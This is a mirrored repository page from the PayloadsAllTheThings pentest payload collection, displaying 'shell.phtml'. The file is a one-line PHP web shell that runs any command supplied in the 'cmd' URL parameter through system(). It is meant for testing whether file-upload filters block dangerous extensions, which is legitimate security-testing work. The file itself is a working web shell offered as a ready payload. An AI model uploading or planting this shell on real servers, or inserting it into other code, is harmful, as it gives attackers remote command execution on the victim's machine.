This website requires JavaScript.
Explore
Help
Register
Sign In
daffainfo
/
PayloadsAllTheThings
mirror of
https://github.com/daffainfo/PayloadsAllTheThings.git
Watch
1
Star
0
Fork
You've already forked PayloadsAllTheThings
0
Code
Issues
Packages
Projects
Releases
Wiki
Activity
2148c89452
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.phtml
1 line
43 B
PHTML
Raw
Blame
History
<?php
echo
"Shell"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink